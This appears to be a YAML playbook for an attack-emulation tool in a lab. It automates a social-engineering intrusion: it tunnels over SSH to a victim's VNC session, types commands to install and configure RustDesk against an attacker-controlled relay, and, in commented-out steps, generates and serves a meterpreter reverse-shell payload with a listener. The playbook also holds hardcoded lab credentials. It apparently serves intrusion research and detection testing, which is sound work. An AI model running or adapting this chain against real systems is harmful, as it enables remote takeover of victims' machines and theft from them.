# Client is persuaded by attacker to download and setup rustdesk screensharing 
# attacker executes commands on client machine via screensharing todownload and executes meterpreter payload

vars:
  PAYLOAD: linux/x64/meterpreter/reverse_tcp
  LPORT: 4443
  ATTACKMATE_IP: 192.42.1.174
  CLIENT_IP: 192.168.50.100
  MGMT_IP: 192.42.0.201
  MGMT_USERNAME: aecid
  CLIENT_VNC_PORT: 5900
  CLIENT_VNC_USER: judy
  CLIENT_VNC_PASSWORD: garland
  ATTACKER_VNC_PORT: 5901
  RUSTDESK_PACKAGE: https://github.com/rustdesk/rustdesk/releases/download/1.3.8/rustdesk-1.3.8-x86_64.deb


commands:
  # establish ssh tunneling via mgmt host, everything sent to attacker port 5902 will be forwarded to client port 5901 (vnc)
  # ssh -i /home/aecid/.ssh/attacker -o StrictHostKeyChecking=no -L 5902:192.168.50.100:5901 aecid@192.42.0.201
  - type: shell
    interactive: true
    creates_session: tunnel
    cmd: "ssh -i /home/aecid/.ssh/attacker  -o StrictHostKeyChecking=no -L 5902:$CLIENT_IP:$CLIENT_VNC_PORT $MGMT_USERNAME@$MGMT_IP \n"

  - type: vnc
    cmd: capture
    filename: initial_screenshot.png
    hostname: localhost
    port: 5902
    creates_session: social_engineering

# Opening a terminal from the menu

  - type: vnc
    cmd: move
    x: 5
    y: 5
    session: social_engineering

  - type: vnc
    cmd: click
    session: social_engineering

  - type: sleep
    seconds: 3

  - type: vnc
    cmd: type
    input: "terminal"
    session: social_engineering
    
  - type: sleep
    seconds: 3

  - type: vnc
    cmd: key
    key: "enter"
    session: social_engineering

  - type: sleep
    seconds: 3

  - type: vnc 
    cmd: type 
    input: "sudo wget -O rustdesk.deb -e use_proxy=yes -e https_proxy=https://192.168.50.254:3128 https://github.com/rustdesk/rustdesk/releases/download/1.3.8/rustdesk-1.3.8-x86_64.deb"
    session: social_engineering

  - type: sleep
    seconds: 2

  - type: vnc
    cmd: key
    key: "enter"
    session: social_engineering

  - type: sleep
    seconds: 30

  - type: vnc 
    cmd: type 
    input: "sudo apt install -fy ./rustdesk.deb"
    session: social_engineering

  - type: vnc
    cmd: key
    key: "enter"
    session: social_engineering
  
  - type: sleep
    seconds: 30

  - type: vnc
    cmd: capture
    filename: post_install.png
    session: social_engineering

  - type: sleep
    seconds: 2

  - type: vnc
    cmd: type
    input: "rustdesk --password password"
    session: social_engineering

  - type: sleep
    seconds: 2

  - type: vnc
    cmd: key
    key: "enter"
    session: social_engineering

  - type: sleep
    seconds: 2

# start rustdesk
  - type: vnc
    cmd: type
    input: "rustdesk"
    session: social_engineering

  - type: sleep
    seconds: 2

  - type: vnc
    cmd: key
    key: "enter"
    session: social_engineering

  - type: sleep
    seconds: 2

# option menu
  - type: vnc
    cmd: move
    x: 167
    y: 188
    session: social_engineering

  - type: sleep
    seconds: 1

  - type: vnc
    cmd: click
    session: social_engineering

  - type: sleep
    seconds: 1

# network
  - type: vnc
    cmd: move
    x: 82
    y: 272
    session: social_engineering

  - type: vnc
    cmd: click
    session: social_engineering

  - type: sleep
    seconds: 1

# unlock network settings, no password?
  - type: vnc
    cmd: move
    x: 468
    y: 131
    session: social_engineering

  - type: vnc
    cmd: click
    session: social_engineering

  - type: sleep
    seconds: 1

# id relay server
  - type: vnc
    cmd: move
    x: 268
    y: 182
    session: social_engineering

  - type: vnc
    cmd: click
    session: social_engineering

  - type: sleep
    seconds: 1

# Enter id server IP
  - type: vnc
    cmd: type
    input: $ATTACKMATE_IP
    session: social_engineering

  - type: sleep
    seconds: 1

# click ok
  - type: vnc
    cmd: move
    x: 621
    y: 490
    session: social_engineering

  - type: vnc
    cmd: click
    session: social_engineering

  - type: sleep
    seconds: 1


  



  # vnc connect to client via tunnel (this is "client is instructed via phone"), take screenshot

  # open terminal and download rust desk package, make executable, install

  # expect screens that prompt user interaction during install process + enter options (1 and 2, then press any key)

  # set rustdesk password

  # start rustdesk

  # somehow configure via gui to use attacker IP as server ID

  # get client id from rustdesk server log on attacker. regex?

  # via shell command start connection from attacker machine with retrieved id and set password

  # vnc connect attacker on its own screen that should now show the clients screen, open terminal, run command to download (facebock.com), make executable and execute install.sh metasploit script

  # use established meterpreter session


#  # tempfile for reverse shell payload
#  - type: mktemp
#    cmd: file
#    variable: RSHELL
#  
#  # generate reverse shell
#  - type: shell
#    cmd: msfvenom -p $PAYLOAD LHOST=$ATTACKMATE_IP LPORT=$LPORT -f elf > ${RSHELL}
#  
#  # serve payload via http
#  - type: webserv
#    local_path: $RSHELL
#    port: 8080
#    background: True
#
#  # prepare reverse-shell-listener
#  - type: msf-module
#    creates_session: revshell
#    cmd: exploit/multi/handler
#    payload: $PAYLOAD
#    payload_options:
#      LHOST: $ATTACKMATE_IP
#      LPORT: $LPORT
#    background: true
#    kill_on_exit: true
#
## get access to client machine to execute the malicious install.sh script
#
#  # run commands via reverse shell
#  - type: msf-session
#    stdapi: true
#    session: revshell
#    cmd: sysinfo



  